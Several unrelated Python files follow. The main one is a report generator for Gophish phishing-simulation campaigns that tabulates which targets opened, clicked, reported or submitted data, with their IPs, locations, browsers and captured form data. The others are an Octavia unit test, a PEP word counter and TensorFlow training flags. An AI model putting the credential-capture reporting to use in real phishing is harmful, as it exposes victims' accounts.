row += 1
worksheet.write(row, col, "Individuals Who Reported", bold_format)
worksheet.write_number(row, col+1, self.total_unique_reported, num_format)
row += 1
worksheet.write(row, col, "")
row += 1
worksheet = goreport_xlsx.add_worksheet("Summary")
row = 0
col = 0
worksheet.set_column(0, 10, 20)
worksheet.write(row, col, "Summary of Events", bold_format)
row += 1
header_col = 0
headers = ["Email Address", "Open", "Click", "Creds", "Report", "OS", "Browser"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
# Sort campaign summary by each dict's email entry and then create results table
target_counter = 0
ordered_results = sorted(self.campaign_results_summary, key=lambda k: k['email'])
for target in ordered_results:
worksheet.write(row, col, target['email'], wrap_format)
if target['opened']:
worksheet.write_boolean(row, col+1, target['opened'], true_format)
else:
worksheet.write_boolean(row, col+1, target['opened'], false_format)
if target['clicked']:
worksheet.write_boolean(row, col+2, target['clicked'], true_format)
else:
worksheet.write_boolean(row, col+2, target['clicked'], false_format)
if target['submitted']:
worksheet.write_boolean(row, col+3, target['submitted'], true_format)
else:
worksheet.write_boolean(row, col+3, target['submitted'], false_format)
if target['reported']:
worksheet.write_boolean(row, col+4, target['reported'], true_format)
else:
worksheet.write_boolean(row, col+4, target['reported'], false_format)
if target['email'] in self.targets_clicked:
for event in self.timeline:
if event.message == "Clicked Link" and event.email == target['email']:
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
os_details = user_agent.os.family + " " + user_agent.os.version_string
worksheet.write(row, col+5, os_details, wrap_format)
worksheet.write(row, col+6, browser_details, wrap_format)
else:
worksheet.write(row, col+5, "N/A", wrap_format)
worksheet.write(row, col+6, "N/A", wrap_format)
row += 1
target_counter += 1
print("[+] Created row for {} of {}.".format(target_counter, self.total_targets))
print("[+] Finished writing events summary...")
print("[+] Detailed results analysis is next and will take some time if you had a lot of targets...")
# End of the event summary and beginning of the detailed results
worksheet = goreport_xlsx.add_worksheet("Event Details")
row = 0
col = 0
worksheet.set_column(0, 10, 40)
worksheet.write(row, col, "Detailed Analysis", bold_format)
row += 1
target_counter = 0
for target in self.results:
# Only create a Detailed Analysis section for targets with clicks
if target.email in self.targets_clicked:
worksheet.write(row, col, "{} {}".format(target.first_name, target.last_name), bold_format)
row += 1
worksheet.write(row, col, target.email, wrap_format)
row += 1
# Go through all events to find events for this target
for event in self.timeline:
if event.message == "Email Sent" and event.email == target.email:
# Parse the timestamp into separate date and time variables
temp = event.time.split('T')
sent_date = temp[0]
sent_time = temp[1].split('.')[0]
# Record the email sent date and time in the report
worksheet.write(row, col, "Sent on {} at {}".format(sent_date.replace(",", ""), sent_time), wrap_format)
row += 1
if event.message == "Email Opened" and event.email == target.email:
# Record the email preview date and time in the report
temp = event.time.split('T')
worksheet.write(row, col, "Email Preview at {} {}".format(temp[0], temp[1].split('.')[0]), wrap_format)
row += 1
if event.message == "Clicked Link" and event.email == target.email:
worksheet.write(row, col, "Email Link Clicked", bold_format)
row += 1
header_col = 0
headers = ["Time", "IP", "Location", "Browser", "Operating System"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
temp = event.time.split('T')
worksheet.write(row, col, "{} {}".format(temp[0], temp[1].split('.')[0]), wrap_format)
# Check if browser IP matches the target's IP and record result
ip_comparison = self.compare_ip_addresses(target.ip,
event.details['browser']['address'],
self.verbose)
worksheet.write(row, col+1, "{}".format(ip_comparison), wrap_format)
# Parse the location data
loc = self.geolocate(target, event.details['browser']['address'], self.google)
worksheet.write(row, col+2, loc, wrap_format)
# Parse the user-agent string and add browser and OS details
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
worksheet.write(row, col+3, browser_details, wrap_format)
self.browsers.append(browser_details)
os_details = user_agent.os.family + " " + user_agent.os.version_string
worksheet.write(row, col+4, os_details, wrap_format)
self.operating_systems.append(os_details)
row += 1
if event.message == "Submitted Data" and event.email == target.email:
# Now we have events for submitted data. A few notes on this:
# 1. There is no expectation of a Submit event without a Clicked Link event
# 2. Assuming that, the following process does NOT flag IP mismatches
# or add to the list of seen locations, OSs, IPs, or browsers.
worksheet.write(row, col, "Submitted Data Captured", bold_format)
row += 1
header_col = 0
headers = ["Time", "IP", "Location", "Browser", "Operating System", "Data Captured"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
temp = event.time.split('T')
worksheet.write(row, col, "{} {}".format(temp[0], temp[1].split('.')[0]), wrap_format)
worksheet.write(row, col+1, "{}".format(event.details['browser']['address']), wrap_format)
loc = self.geolocate(target, event.details['browser']['address'], self.google)
worksheet.write(row, col+2, loc, wrap_format)
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
worksheet.write(row, col+3, browser_details, wrap_format)
os_details = user_agent.os.family + " " + user_agent.os.version_string
worksheet.write(row, col+4, os_details, wrap_format)
# Get just the submitted data from the event's payload
submitted_data = ""
data_payload = event.details['payload']
# Get all of the submitted data
for key, value in data_payload.items():
# To get just submitted data, we drop the 'rid' key
if not key == "rid":
submitted_data += "{}:{}".format(key, str(value).strip("[").strip("]"))
worksheet.write(row, col+5, submitted_data, wrap_format)
row += 1
target_counter += 1
print("[+] Processed detailed analysis for {} of {}.".format(target_counter, self.total_targets))
else:
# This target had no clicked or submitted events so move on to next
target_counter += 1
print("[+] Processed detailed analysis for {} of {}.".format(target_counter, self.total_targets))
continue
worksheet.write(row, col, "")
row += 1
print("[+] Finished writing detailed analysis...")
worksheet = goreport_xlsx.add_worksheet("Stats")
row = 0
col = 0
worksheet.set_column(0, 10, 35)
worksheet.write(row, col, "Recorded Browsers Based on User-Agents:", bold_format)
row += 1
header_col = 0
headers = ["Browser", "Seen"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
counted_browsers = Counter(self.browsers)
for key, value in counted_browsers.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write_number(row, col+1, value, num_format)
row += 1
worksheet.write(row, col, "")
row += 1
worksheet.write(row, col, "Record OS From Browser User-Agents:", bold_format)
row += 1
header_col = 0
headers = ["Operating System", "Seen"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
counted_os = Counter(self.operating_systems)
for key, value in counted_os.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write_number(row, col+1, value, num_format)
row += 1
worksheet.write(row, col, "")
row += 1
worksheet.write(row, col, "Recorded Locations from IPs:", bold_format)
row += 1
header_col = 0
headers = ["Locations", "Seen"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
counted_locations = Counter(self.locations)
for key, value in counted_locations.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write_number(row, col+1, value, num_format)
row += 1
worksheet.write(row, col, "")
row += 1
worksheet.write(row, col, "Recorded IPs:", bold_format)
row += 1
header_col = 0
headers = ["IP Address", "Seen"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
counted_ip_addresses = Counter(self.ip_addresses)
for key, value in counted_ip_addresses.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write_number(row, col+1, value, num_format)
row += 1
worksheet.write(row, col, "Recorded IPs and Locations:", bold_format)
row += 1
header_col = 0
headers = ["IP Address", "Location"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
for key, value in self.ip_and_location.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write(row, col+1, "{}".format(value), wrap_format)
row += 1
goreport_xlsx.close()
print("[+] Done! Check \'{}\' for your results.".format(self.output_xlsx_report))
def write_word_report(self):
"""Assemble and output the Word docx file report."""
# Create document writer using the template and a style editor
d = Document("template.docx")
styles = d.styles
# Create a custom styles for table cells
style = styles.add_style("Cell Text", WD_STYLE_TYPE.CHARACTER)
cell_text = d.styles["Cell Text"]
cell_text_font = cell_text.font
cell_text_font.name = "Calibri"
cell_text_font.size = Pt(12)
cell_text_font.bold = True
cell_text_font.color.rgb = RGBColor(0xFF, 0xFF, 0xFF)
style = styles.add_style("Cell Text Hit", WD_STYLE_TYPE.CHARACTER)
cell_text_hit = d.styles["Cell Text Hit"]
cell_text_hit_font = cell_text_hit.font
cell_text_hit_font.name = "Calibri"
cell_text_hit_font.size = Pt(12)
cell_text_hit_font.bold = True
cell_text_hit_font.color.rgb = RGBColor(0x00, 0x96, 0x00)
style = styles.add_style("Cell Text Miss", WD_STYLE_TYPE.CHARACTER)
cell_text_miss = d.styles["Cell Text Miss"]
cell_text_miss_font = cell_text_miss.font
cell_text_miss_font.name = "Calibri"
cell_text_miss_font.size = Pt(12)
cell_text_miss_font.bold = True
cell_text_miss_font.color.rgb = RGBColor(0xFF, 0x00, 0x00)
# Write a campaign summary at the top of the report
d.add_heading("Executive Summary", 1)
p = d.add_paragraph()
run = p.add_run("Campaign Results For: {}".format(self.cam_name))
run.bold = True
# Runs are basically "runs" of text and must be aligned like we want
# them aligned in the report -- thus they are pushed left
if self.cam_status == "Completed":
completed_status = "Completed:\t{} on {}".format(self.completed_date.split("T")[1].split(".")[0],
self.completed_date.split("T")[0])
else:
completed_status = "Still Active"
p.add_run("""
Status: {}
Created: {} on {}
Started: {} on {}
Completed: {}
""".format(self.cam_status, self.created_date.split("T")[1].split(".")[0], self.created_date.split("T")[0],
self.launch_date.split("T")[1].split(".")[0], self.launch_date.split("T")[0], completed_status))
if self.cam_status == "Completed":
print()
# Write the campaign details -- email details and template settings
run = p.add_run("Campaign Details")
run.bold = True
p.add_run("""
From: {}
Subject: {}
Phish URL: {}
Redirect URL: {}
Attachment(s): {}
Captured Credentials: {}
Stored Passwords: {}
""".format(self.cam_from_address, self.cam_subject_line, self.cam_url,
self.cam_redirect_url, self.cam_template_attachments, self.cam_capturing_credentials,
self.cam_capturing_passwords))
# Write a high level summary for stats
run = p.add_run("High Level Results")
run.bold = True
p.add_run("""
Total Targets: {}
The following totals indicate how many events of each type Gophish recorded:
Total Open Events: {}
Total Click Events: {}
Total Report Events: {}
Total Submitted Data Events: {}
The following totals indicate how many targets participated in each event type:
Individuals Who Opened: {}
Individuals Who Clicked: {}
Individuals Who Reported: {}
Individuals Who Submitted: {}
""".format(self.total_targets, self.total_opened, self.total_clicked, self.total_reported,
self.total_submitted, self.total_unique_opened, self.total_unique_clicked,
self.total_unique_reported, self.total_unique_submitted))
d.add_page_break()
print("[+] Finished writing high level summary...")
# End of the campaign summary and beginning of the event summary
d.add_heading("Summary of Events", 1)
d.add_paragraph("The following table summarizes who opened and clicked on emails sent in this campaign.")
# Create a table to hold the event summary results
table = d.add_table(rows=len(self.campaign_results_summary) + 1, cols=7, style="GoReport")
header0 = table.cell(0, 0)
header0.text = ""
header0.paragraphs[0].add_run("Email Address", "Cell Text").bold = True
header1 = table.cell(0, 1)
header1.text = ""
header1.paragraphs[0].add_run("Open", "Cell Text").bold = True
header2 = table.cell(0, 2)
header2.text = ""
header2.paragraphs[0].add_run("Click", "Cell Text").bold = True
header3 = table.cell(0, 3)
header3.text = ""
header3.paragraphs[0].add_run("Data", "Cell Text").bold = True
header4 = table.cell(0, 4)
header4.text = ""
header4.paragraphs[0].add_run("Report", "Cell Text").bold = True
header5 = table.cell(0, 5)
header5.text = ""
header5.paragraphs[0].add_run("OS", "Cell Text").bold = True
header6 = table.cell(0, 6)
header6.text = ""
header6.paragraphs[0].add_run("Browser", "Cell Text").bold = True
# Sort campaign summary by each dict's email entry and then create results table
target_counter = 0
counter = 1
ordered_results = sorted(self.campaign_results_summary, key=lambda k: k['email'])
for target in ordered_results:
email_cell = table.cell(counter, 0)
email_cell.text = "{}".format(target['email'])
temp_cell = table.cell(counter, 1)
if target['opened']:
temp_cell.paragraphs[0].add_run(u'\u2713', "Cell Text Hit")
else:
temp_cell.paragraphs[0].add_run(u'\u2718', "Cell Text Miss")
temp_cell = table.cell(counter, 2)
if target['clicked']:
temp_cell.paragraphs[0].add_run(u'\u2713', "Cell Text Hit")
else:
temp_cell.paragraphs[0].add_run(u'\u2718', "Cell Text Miss")
temp_cell = table.cell(counter, 3)
if target['submitted']:
temp_cell.paragraphs[0].add_run(u'\u2713', "Cell Text Hit")
else:
temp_cell.paragraphs[0].add_run(u'\u2718', "Cell Text Miss")
temp_cell = table.cell(counter, 4)
if target['reported']:
temp_cell.paragraphs[0].add_run(u'\u2713', "Cell Text Hit")
else:
temp_cell.paragraphs[0].add_run(u'\u2718', "Cell Text Miss")
if target['email'] in self.targets_clicked:
for event in self.timeline:
if event.message == "Clicked Link" and event.email == target['email']:
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
os_details = user_agent.os.family + " " + \
user_agent.os.version_string
temp_cell = table.cell(counter, 5)
temp_cell.text = os_details
temp_cell = table.cell(counter, 6)
temp_cell.text = browser_details
else:
temp_cell = table.cell(counter, 5)
temp_cell.text = "N/A"
temp_cell = table.cell(counter, 6)
temp_cell.text = "N/A"
counter += 1
target_counter += 1
print("[+] Created table entry for {} of {}.".format(
target_counter, self.total_targets))
d.add_page_break()
# End of the event summary and beginning of the detailed results
print("[+] Finished writing events summary...")
print("[+] Detailed results analysis is next and may take some time if you had a lot of targets...")
d.add_heading("Detailed Findings", 1)
target_counter = 0
for target in self.results:
# Only create a Detailed Analysis section for targets with clicks
if target.email in self.targets_clicked:
# Create counters to track table cell locations
opened_counter = 1
clicked_counter = 1
submitted_counter = 1
# Create section starting with a header with the first and last name
d.add_heading("{} {}".format(target.first_name, target.last_name), 2)
p = d.add_paragraph(target.email)
p = d.add_paragraph()
# Save a spot to record the email sent date and time in the report
email_sent_run = p.add_run()
# Go through all events to find events for this target
for event in self.timeline:
if event.message == "Email Sent" and event.email == target.email:
# Parse the timestamp into separate date and time variables
# Ex: 2017-01-30T14:31:22.534880731-05:00
temp = event.time.split('T')
sent_date = temp[0]
sent_time = temp[1].split('.')[0]
# Record the email sent date and time in the run created earlier
email_sent_run.text = "Email sent on {} at {}".format(sent_date, sent_time)
if event.message == "Email Opened" and event.email == target.email:
if opened_counter == 1:
# Create the Email Opened/Previewed table
p = d.add_paragraph()
p.style = d.styles['Normal']
run = p.add_run("Email Previews")
run.bold = True
opened_table = d.add_table(rows=1, cols=1, style="GoReport")
opened_table.autofit = True
opened_table.allow_autofit = True
header1 = opened_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Time", "Cell Text").bold = True
# Begin by adding a row to the table and inserting timestamp
opened_table.add_row()
timestamp = opened_table.cell(opened_counter, 0)
temp = event.time.split('T')
timestamp.text = temp[0] + " " + temp[1].split('.')[0]
opened_counter += 1
if event.message == "Clicked Link" and event.email == target.email:
if clicked_counter == 1:
# Create the Clicked Link table
p = d.add_paragraph()
p.style = d.styles['Normal']
run = p.add_run("Email Link Clicked")
run.bold = True
clicked_table = d.add_table(rows=1, cols=5, style="GoReport")
clicked_table.autofit = True
clicked_table.allow_autofit = True
header1 = clicked_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Time", "Cell Text").bold = True
header2 = clicked_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("IP", "Cell Text").bold = True
header3 = clicked_table.cell(0, 2)
header3.text = ""
header3.paragraphs[0].add_run("Location", "Cell Text").bold = True
header4 = clicked_table.cell(0, 3)
header4.text = ""
header4.paragraphs[0].add_run("Browser", "Cell Text").bold = True
header5 = clicked_table.cell(0, 4)
header5.text = ""
header5.paragraphs[0].add_run("Operating System",
"Cell Text").bold = True
clicked_table.add_row()
timestamp = clicked_table.cell(clicked_counter, 0)
temp = event.time.split('T')
timestamp.text = temp[0] + " " + temp[1].split('.')[0]
ip_add = clicked_table.cell(clicked_counter, 1)
# Check if browser IP matches the target's IP and record result
ip_add.text = self.compare_ip_addresses(
target.ip, event.details['browser']['address'], self.verbose)
# Parse the location data
event_location = clicked_table.cell(clicked_counter, 2)
event_location.text = self.geolocate(target, event.details['browser']['address'], self.google)
# Parse the user-agent string for browser and OS details
user_agent = parse(event.details['browser']['user-agent'])
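# parse() turns the raw user-agent string into an object whose browser/os
# attributes render to values such as "Chrome 61.0.3163" and "Windows 10"
# (illustrative values, not taken from any real campaign)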
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
browser = clicked_table.cell(clicked_counter, 3)
browser.text = browser_details
self.browsers.append(browser_details)
op_sys = clicked_table.cell(clicked_counter, 4)
os_details = user_agent.os.family + " " + user_agent.os.version_string
op_sys.text = os_details
self.operating_systems.append(os_details)
clicked_counter += 1
if event.message == "Submitted Data" and event.email == target.email:
if submitted_counter == 1:
# Create the Submitted Data table
p = d.add_paragraph()
p.style = d.styles['Normal']
run = p.add_run("Data Captured")
run.bold = True
submitted_table = d.add_table(rows=1, cols=6, style="GoReport")
submitted_table.autofit = True
submitted_table.allow_autofit = True
header1 = submitted_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Time", "Cell Text").bold = True
header2 = submitted_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("IP", "Cell Text").bold = True
header3 = submitted_table.cell(0, 2)
header3.text = ""
header3.paragraphs[0].add_run("Location", "Cell Text").bold = True
header4 = submitted_table.cell(0, 3)
header4.text = ""
header4.paragraphs[0].add_run("Browser", "Cell Text").bold = True
header5 = submitted_table.cell(0, 4)
header5.text = ""
header5.paragraphs[0].add_run("Operating System",
"Cell Text").bold = True
header6 = submitted_table.cell(0, 5)
header6.text = ""
header6.paragraphs[0].add_run("Data Captured",
"Cell Text").bold = True
submitted_table.add_row()
timestamp = submitted_table.cell(submitted_counter, 0)
temp = event.time.split('T')
timestamp.text = temp[0] + " " + temp[1].split('.')[0]
ip_add = submitted_table.cell(submitted_counter, 1)
ip_add.text = event.details['browser']['address']
# Parse the location data
event_location = submitted_table.cell(submitted_counter, 2)
event_location.text = self.geolocate(target, event.details['browser']['address'], self.google)
# Parse the user-agent string and add browser and OS details
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
browser = submitted_table.cell(submitted_counter, 3)
browser.text = browser_details
op_sys = submitted_table.cell(submitted_counter, 4)
os_details = user_agent.os.family + " " + user_agent.os.version_string
op_sys.text = "{}".format(os_details)
# Get just the submitted data from the event's payload
submitted_data = ""
data = submitted_table.cell(submitted_counter, 5)
data_payload = event.details['payload']
# Get all of the submitted data
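# Illustrative payload (hypothetical values): {'rid': ['Ab12Cd3'],
# 'email': ['user@example.com'], 'password': ['Autumn2017']} becomes
# "email:'user@example.com' password:'Autumn2017' " once 'rid' is dropped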
for key, value in data_payload.items():
# To get just submitted data, we drop the 'rid' key
if not key == "rid":
submitted_data += "{}:{} ".format(
key, str(value).strip("[").strip("]"))
data.text = "{}".format(submitted_data)
submitted_counter += 1
target_counter += 1
print("[+] Processed detailed analysis for {} of {}.".format(
target_counter, self.total_targets))
d.add_page_break()
else:
# This target had no clicked or submitted events so move on to next
target_counter += 1
print("[+] Processed detailed analysis for {} of {}.".format(target_counter, self.total_targets))
continue
print("[+] Finished writing Detailed Analysis section...")
# End of the detailed results and the beginning of browser, location, and OS stats
d.add_heading("Statistics", 1)
p = d.add_paragraph("The following table shows the browsers seen:")
# Create browser table
browser_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(browser_table.columns[0], Cm(7.24))
self._set_word_column_width(browser_table.columns[1], Cm(3.35))
header1 = browser_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Browser", "Cell Text").bold = True
header2 = browser_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Seen", "Cell Text").bold = True
p = d.add_paragraph("\nThe following table shows the operating systems seen:")
# Create OS table
os_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(os_table.columns[0], Cm(7.24))
self._set_word_column_width(os_table.columns[1], Cm(3.35))
header1 = os_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Operating System", "Cell Text").bold = True
header2 = os_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Seen", "Cell Text").bold = True
p = d.add_paragraph("\nThe following table shows the locations seen:")
# Create geo IP table
location_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(location_table.columns[0], Cm(7.24))
self._set_word_column_width(location_table.columns[1], Cm(3.35))
header1 = location_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Location", "Cell Text").bold = True
header2 = location_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Visits", "Cell Text").bold = True
p = d.add_paragraph("\nThe following table shows the IP addresses captured:")
# Create IP address table
ip_add_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(ip_add_table.columns[0], Cm(7.24))
self._set_word_column_width(ip_add_table.columns[1], Cm(3.35))
header1 = ip_add_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("IP Address", "Cell Text").bold = True
header2 = ip_add_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Seen", "Cell Text").bold = True
p = d.add_paragraph("\nThe following table shows the IP addresses matched with geolocation data:")
# Create IP address and location table
ip_loc_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(ip_loc_table.columns[0], Cm(7.24))
self._set_word_column_width(ip_loc_table.columns[1], Cm(3.35))
header1 = ip_loc_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("IP Address", "Cell Text").bold = True
header2 = ip_loc_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Location", "Cell Text").bold = True
# Counters are used here again to track rows
counter = 1
# Counter is used to count all elements in the lists to create a unique list with totals
counted_browsers = Counter(self.browsers)
for key, value in counted_browsers.items():
browser_table.add_row()
cell = browser_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = browser_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
counter = 1
counted_os = Counter(self.operating_systems)
for key, value in counted_os.items():
os_table.add_row()
cell = os_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = os_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
counter = 1
counted_locations = Counter(self.locations)
for key, value in counted_locations.items():
location_table.add_row()
cell = location_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = location_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
counter = 1
counted_ip_addresses = Counter(self.ip_addresses)
for key, value in counted_ip_addresses.items():
ip_add_table.add_row()
cell = ip_add_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = ip_add_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
counter = 1
for key, value in self.ip_and_location.items():
ip_loc_table.add_row()
cell = ip_loc_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = ip_loc_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
# Finalize document and save it as the value of output_word_report
d.save("{}".format(self.output_word_report))
print("[+] Done! Check \"{}\" for your results.".format(self.output_word_report))
def config_section_map(self, config_parser, section):
"""This function helps by reading accepting a config file section, from gophish.config,
and returning a dictionary object that can be referenced for configuration settings.
"""
section_dict = {}
options = config_parser.options(section)
for option in options:
try:
section_dict[option] = config_parser.get(section, option)
if section_dict[option] == -1:
print("[-] Skipping: {}".format(option))
except Exception:
print("[!] There was an error with: {}".format(option))
section_dict[option] = None
return section_dict
|
the-stack_0_25885
|
# Copyright 2018 GoDaddy
# Copyright (c) 2015 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from unittest import mock
from oslo_utils import uuidutils
from octavia.common import data_models
from octavia.statistics.drivers import update_db
from octavia.tests.unit import base
class TestStatsUpdateDb(base.TestCase):
def setUp(self):
super(TestStatsUpdateDb, self).setUp()
self.amphora_id = uuidutils.generate_uuid()
self.listener_id = uuidutils.generate_uuid()
@mock.patch('octavia.db.repositories.ListenerStatisticsRepository')
@mock.patch('octavia.db.api.get_session')
def test_update_stats(self, mock_get_session, mock_listener_stats_repo):
bytes_in1 = random.randrange(1000000000)
bytes_out1 = random.randrange(1000000000)
active_conns1 = random.randrange(1000000000)
total_conns1 = random.randrange(1000000000)
request_errors1 = random.randrange(1000000000)
stats_1 = data_models.ListenerStatistics(
listener_id=self.listener_id,
amphora_id=self.amphora_id,
bytes_in=bytes_in1,
bytes_out=bytes_out1,
active_connections=active_conns1,
total_connections=total_conns1,
request_errors=request_errors1
)
bytes_in2 = random.randrange(1000000000)
bytes_out2 = random.randrange(1000000000)
active_conns2 = random.randrange(1000000000)
total_conns2 = random.randrange(1000000000)
request_errors2 = random.randrange(1000000000)
stats_2 = data_models.ListenerStatistics(
listener_id=self.listener_id,
amphora_id=self.amphora_id,
bytes_in=bytes_in2,
bytes_out=bytes_out2,
active_connections=active_conns2,
total_connections=total_conns2,
request_errors=request_errors2
)
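# The driver is exercised twice below: with deltas=False the stats should
# overwrite the stored rows via the repository's replace(), and with
# deltas=True they should be added to the stored rows via increment()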
update_db.StatsUpdateDb().update_stats(
[stats_1, stats_2], deltas=False)
mock_listener_stats_repo().replace.assert_has_calls([
mock.call(mock_get_session(), stats_1),
mock.call(mock_get_session(), stats_2)
])
update_db.StatsUpdateDb().update_stats(
[stats_1, stats_2], deltas=True)
mock_listener_stats_repo().increment.assert_has_calls([
mock.call(mock_get_session(), stats_1),
mock.call(mock_get_session(), stats_2)
])
|
the-stack_0_25889
|
#!/usr/bin/env python3
"""Count the frequency of various phrases, given the path to the Python PEPs.
In Python PEPs, the opposite of “subclass” is almost always “base class” — just remember that the builtin is named super(), not base()! Stats:
216 base class
0 child class
10 derived class
12 parent class
372 subclass
10 super class
44 superclass
"""
import argparse
import os
import re
import sys
TERMS = (
'superclass',
'super class',
'subclass',
'base class',
'derived class',
'parent class',
'child class',
)
def main(argv):
parser = argparse.ArgumentParser(description='PEP terminology counts')
parser.add_argument('pepsdir', help='path to PEPs repo')
try:
args = parser.parse_args(argv)
except SystemExit:
print('\nTo checkout the PEPs from version control, git clone:'
'\nhttps://github.com/python/peps.git', file=sys.stderr)
raise
peps = []
for dirpath, dirnames, filenames in os.walk(args.pepsdir):
for filename in filenames:
if filename.endswith(('.rst', '.txt')):
peps.append(os.path.join(dirpath, filename))
counts = {term: 0 for term in TERMS}
for pep in peps:
with open(pep) as f:
content = f.read()
text = ' '.join(re.findall(r'\w+', content.lower()))
# text = ' '.join(content.lower().replace('.', ' ').split())
for term in TERMS:
n = text.count(' ' + term + ' ')
m = text.count(' ' + term + 'es ')
counts[term] += n + m
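# e.g. for 'base class' this adds the counts of ' base class ' and
# ' base classes ' in the space-padded text, so singular and plural
# occurrences are tallied under the same term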
for term in sorted(TERMS):
print('{:5} {}'.format(counts[term], term))
if __name__ == '__main__':
main(sys.argv[1:])
|
the-stack_0_25891
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generic training script that trains a model using a given dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import tensorflow as tf
sys.path.insert(0, './slim/')
from datasets import dataset_factory_fgvc
from deployment import model_deploy
from nets import nets_factory
from preprocessing import preprocessing_factory
slim = tf.contrib.slim
tf.app.flags.DEFINE_string(
'master', '', 'The address of the TensorFlow master to use.')
tf.app.flags.DEFINE_string(
'train_dir', None,
'Directory where checkpoints and event logs are written to.')
tf.app.flags.DEFINE_integer('num_clones', 1,
'Number of model clones to deploy. Note: for '
'historical reasons the loss from all clones is '
'averaged and learning rate decay happens per '
'clone epoch.')
tf.app.flags.DEFINE_boolean('clone_on_cpu', False,
'Use CPUs to deploy clones.')
tf.app.flags.DEFINE_integer('worker_replicas', 1, 'Number of worker replicas.')
tf.app.flags.DEFINE_integer(
'num_ps_tasks', 0,
'The number of parameter servers. If the value is 0, then the parameters '
'are handled locally by the worker.')
tf.app.flags.DEFINE_integer(
'num_readers', 4,
'The number of parallel readers that read data from the dataset.')
tf.app.flags.DEFINE_integer(
'num_preprocessing_threads', 4,
'The number of threads used to create the batches.')
tf.app.flags.DEFINE_integer(
'log_every_n_steps', 10,
'The frequency with which logs are print.')
tf.app.flags.DEFINE_integer(
'save_summaries_secs', 10,
'The frequency with which summaries are saved, in seconds.')
tf.app.flags.DEFINE_integer(
'save_interval_secs', 60,
'The frequency with which the model is saved, in seconds.')
tf.app.flags.DEFINE_integer(
'task', 0, 'Task id of the replica running the training.')
######################
# Optimization Flags #
######################
tf.app.flags.DEFINE_float(
'weight_decay', 0.00004, 'The weight decay on the model weights.')
tf.app.flags.DEFINE_string(
'optimizer', 'momentum',
'The name of the optimizer, one of "adadelta", "adagrad", "adam",'
'"ftrl", "momentum", "sgd" or "rmsprop".')
tf.app.flags.DEFINE_float(
'adadelta_rho', 0.95,
'The decay rate for adadelta.')
tf.app.flags.DEFINE_float(
'adagrad_initial_accumulator_value', 0.1,
'Starting value for the AdaGrad accumulators.')
tf.app.flags.DEFINE_float(
'adam_beta1', 0.9,
'The exponential decay rate for the 1st moment estimates.')
